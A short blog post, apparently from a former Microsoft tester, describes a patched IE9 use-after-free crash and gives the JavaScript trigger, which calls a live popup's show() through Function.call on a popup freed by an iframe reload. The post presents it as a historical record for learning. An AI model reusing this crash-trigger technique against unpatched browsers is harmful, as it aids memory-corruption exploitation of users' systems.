IE9 Crash (Deadcall): Calling show() of a Dead createPopup via Function.call

This was the first entry in what I called the “deadcall” collection — a series of crashes where Function.call (and equivalently bind and apply) was used to execute a method of one object on behalf of a destroyed object. Here, the show() method of a live popup was called on behalf of a dead one.

var goodPop = createPopup();
var badPop = iFrame.createPopup();

iFrame.location.reload(); // badPop is now dead

setTimeout(function() {
    goodPop.show.call(badPop, 0, 0, 500, 500); // PROBABLY_EXPLOITABLE crash
});

Function.call allowed bypassing the normal method dispatch by substituting badPop as this for goodPop.show. After the reload, badPop’s backing CDoc had been freed, but the JavaScript wrapper was still reachable. Calling show() through it tried to send a window message to the freed document object, causing an access violation in MSHTML!CDoc::OnWindowMessage that was rated PROBABLY_EXPLOITABLE.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 Crash (Deadcall): cloneRange on a Dead Range] :: [IE9 Crash (Deadcall): appendChild on a Dead createDocumentFragment] >